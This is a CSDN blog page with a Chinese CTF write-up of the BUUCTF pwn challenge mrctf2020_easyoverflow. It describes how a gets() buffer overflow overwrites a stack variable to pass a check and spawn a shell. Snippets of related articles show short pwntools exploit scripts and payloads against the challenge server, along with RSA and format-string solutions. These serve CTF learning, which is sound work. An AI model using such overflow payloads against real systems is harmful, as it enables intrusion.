BUUCTF------mrctf2020_easyoverflow

最新推荐文章于 2024-03-15 23:57:51 发布
最新推荐文章于 2024-03-15 23:57:51 发布
阅读量354 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33010875/article/details/120654982
版权
本文介绍了在BUUCTF mrctf2020_easyoverflow挑战中,如何利用溢出条件执行系统命令。通过分析checksec文件和ida,发现主要目标是使check函数返回值为1。关键在于覆盖main函数中v5变量的值,使其等于特定字符串,进而利用get函数实现目的。最终成功执行了系统命令。
摘要由CSDN通过智能技术生成

环境:WSL2,ubuntu16.04,python2

checksec文件:
在这里插入图片描述
拖入ida分析:
在这里插入图片描述
main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行

查看check函数:
在这里插入图片描述
只要a1和fake_flag相等,函数就能返回1
a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g
fake_flag的值为:n0t_r3@11y_f1@g
在这里插入图片描述

只要将v5的值覆盖为n0t_r3@11y_f1@g即可

main函数中有get函数可用,
v4:
在这里插入图片描述

最低0.47元/天 解锁文章
12Shen
关注
[MRCTF2020]Easy_RSA
weixin_44110537的博客
07-20 1420
encrypt import sympy from gmpy2 import gcd, invert from random import randint from Crypto.Util.number import getPrime, isPrime, getRandomNBitInteger, bytes_to_long, long_to_bytes import base64 from zlib import * flag = b"MRCTF{XXXX}" base = 65537 def gen
[BUUCTF]PWN——mrctf2020_easyoverflow
mcmuyanga的博客
01-12 979
mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shell check() 很简单的检查,就是判断一下v5是否等于n0t_r3@11y_f1@g 看main函数可以知道,v5一开始是ju3t_@_f@k3_f1@g,之后没有对v5的操作了,然后让我们输入v4,看一下v4和v5在栈上的位置,发现v5就在v4下方不远处 v4的输入是用的gets函数,我们可以在
mrctf2020_easyoverflow
z1r0的博客
12-12 555
mrctf2020_easyoverflow 查看保护 有个溢出,可以覆盖掉v5。v5等于n0t_r3@11y_f1@g即可get_shell。所以溢出改v5就行。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26447) else: r = pr
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4340
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
buuctfMRCTF2020-Ezpop小白详解
最新发布
m0_73860001的博客
03-15 1139
真的很详细
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
mrctf2020_easyoverflow [write up]
m0_73756460的博客
01-14 270
buuctf 刷题 mrctf2020_easyoverflow [write up]
[BUUCTF-pwn]——mrctf2020_easyoverflow
Y_peak的博客
03-29 225
[BUUCTF-pwn]——mrctf2020_easyoverflow 题目不难这里就简单讲下思路 思路 因为check函数返回0才可以得到shell. 通过gets函数,我们可以将v5修改为我们想要的。 找到fake_flag 为n0t_r3@11y_f1@g 修改为这个就可以了。相同肯定返回0. exploit from pwn import * p = remote("node3.buuoj.cn",26609) payload = 'a'* 0x30 + "n0t_r3@11y_f1@g" p.s
BUUCTF pwn——mrctf2020_easyoverflow
CNS-Enterprise BCC-1701-J
05-25 127
BUUCTF 做题练习
BUUCTF(pwn)mrctf2020_easyoverflow
半岛铁盒的博客
04-06 588
简单的溢出覆盖 from pwn import * r=remote("node3.buuoj.cn",25789) payload='a'*0x30+"n0t_r3@11y_f1@g" r.sendline(payload) r.interactive()
mrctf2020_easyrop
z1r0的博客
04-10 375
mrctf2020_easyrop 查看保护 简单题 用hehe和byby这两个函数配合起来rop就行 from pwn import * from time import sleep context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1
buu [MRCTF2020]EasyCpp
YenKoc的博客
04-17 792
上次没写出,这次认真分析了一下,发现自己的调试水平也有了上涨,也看了一些C++逆向的文章,尤其是stl,发现C++的oop还是挺复杂,这题还没考啥虚函数的还行了。 一.拖入ida,找到主函数,还是挺容易的 int __cdecl main(int argc, const char **argv, const char **envp) { double v3; // xmm0_8 __int...
BUUCTF(pwn)mrctf2020_easy_equation
半岛铁盒的博客
03-30 655
这道题是个相对简单的格式化字符串的题目, 但是做题过程中需要自己的一些debug调试查看; 计算偏移量 初看偏移量是8; 构建初始payload,EXP;payload="aa%8$n"+p64(judge) from pwn import* context.log_level='debug' p=remote('node3.buuoj.cn',27636) judge=0x60105c payload="aa%8$n"+p64(judge) p.sendline(payload) p.inter
[MRCTF2020]EasyCpp
m0_46296905的博客
04-20 908
题目:[MRCTF2020]EasyCpp 这题是一个用g++编译的C++逆向题,第一次碰到这种类型,边做边学习吧。 因为是初次接触C++逆向,如有不足,欢迎评论区指正。 一、main IDA64查看main函数的伪代码如下,各个反汇编后伪代码的注释也已经给出,仅供参考: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rbx __int6
MRCTF2020——crypto——Easy_RSA——babyRSA
weixin_44159598的博客
03-29 2376
babyrsa 根据主函数可知,首要目的是找到_P和_Q,首先来看_P 可以发现 题目已给出P[9],所以直接目的可以手动测试周围素数,直到找到全部(这里是一部分) 这里我们可以得到N factor = pow(p, base, n) 这一句说明我们应该将这个简单RSA解出来,此时按照一般RSA的步骤求得d 这里已经得到N的所有因数,所以此时N的欧拉函数为所有因数减1相乘,即(p1-...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值